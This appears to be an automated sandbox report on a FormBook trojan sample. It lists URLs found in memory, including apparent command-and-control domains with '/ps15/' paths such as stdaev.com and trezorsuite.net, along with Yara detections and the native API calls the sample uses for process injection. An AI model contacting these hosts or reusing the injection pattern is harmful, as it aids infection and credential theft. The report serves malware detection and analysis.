                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stdaev.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stdaev.com/ps15/www.seraphmovement.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.stdaev.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thepeacedealers.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thepeacedealers.com/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thepeacedealers.com/ps15/www.casinomaxnodepositbonus.icu
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thepeacedealers.comReferer:
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.net
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.net/ps15/
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.net/ps15/www.gomenasorry.com
                Source: explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.trezorsuite.netReferer:
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: explorer.exe, 0000000C.00000003.2271650261.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000C.00000002.3737130665.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1308477475.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                Source: explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 0000000C.00000000.1312007503.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
                Source: explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 0000000C.00000000.1308477475.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1540, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: cmmon32.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                .NET source code contains very large array initializations
                Source: xU0wdBC6XWRZ6UY.exe, Cows.csLarge array initialization: : array initializer size 653909
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A350 NtCreateFile,11_2_0041A350
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A400 NtReadFile,11_2_0041A400
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A480 NtClose,11_2_0041A480
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A530 NtAllocateVirtualMemory,11_2_0041A530
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A2C2 NtCreateFile,11_2_0041A2C2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A3FA NtReadFile,11_2_0041A3FA
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041A47C NtClose,11_2_0041A47C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062B60 NtClose,LdrInitializeThunk,11_2_01062B60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_01062BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062AD0 NtReadFile,LdrInitializeThunk,11_2_01062AD0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062D10 NtMapViewOfSection,LdrInitializeThunk,11_2_01062D10
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_01062D30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062DD0 NtDelayExecution,LdrInitializeThunk,11_2_01062DD0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01062DF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01062C70
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_01062CA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062F30 NtCreateSection,LdrInitializeThunk,11_2_01062F30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062F90 NtProtectVirtualMemory,LdrInitializeThunk,11_2_01062F90
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062FB0 NtResumeThread,LdrInitializeThunk,11_2_01062FB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062FE0 NtCreateFile,LdrInitializeThunk,11_2_01062FE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_01062E80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_01062EA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01064340 NtSetContextThread,11_2_01064340
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01064650 NtSuspendThread,11_2_01064650
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062B80 NtQueryInformationFile,11_2_01062B80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062BA0 NtEnumerateValueKey,11_2_01062BA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062BE0 NtQueryValueKey,11_2_01062BE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062AB0 NtWaitForSingleObject,11_2_01062AB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062AF0 NtWriteFile,11_2_01062AF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062D00 NtSetInformationFile,11_2_01062D00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062DB0 NtEnumerateKey,11_2_01062DB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062C00 NtQueryInformationProcess,11_2_01062C00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062C60 NtCreateKey,11_2_01062C60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062CC0 NtQueryVirtualMemory,11_2_01062CC0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062CF0 NtOpenProcess,11_2_01062CF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062F60 NtCreateProcessEx,11_2_01062F60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062FA0 NtQuerySection,11_2_01062FA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062E30 NtWriteVirtualMemory,11_2_01062E30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01062EE0 NtQueueApcThread,11_2_01062EE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063010 NtOpenDirectoryObject,11_2_01063010
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063090 NtSetValueKey,11_2_01063090
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010635C0 NtCreateMutant,11_2_010635C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010639B0 NtGetContextThread,11_2_010639B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063D10 NtOpenProcessToken,11_2_01063D10
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01063D70 NtOpenThread,11_2_01063D70
                Source: C:\Windows\explorer.exeCode function: 12_2_0869E232 NtCreateFile,12_2_0869E232
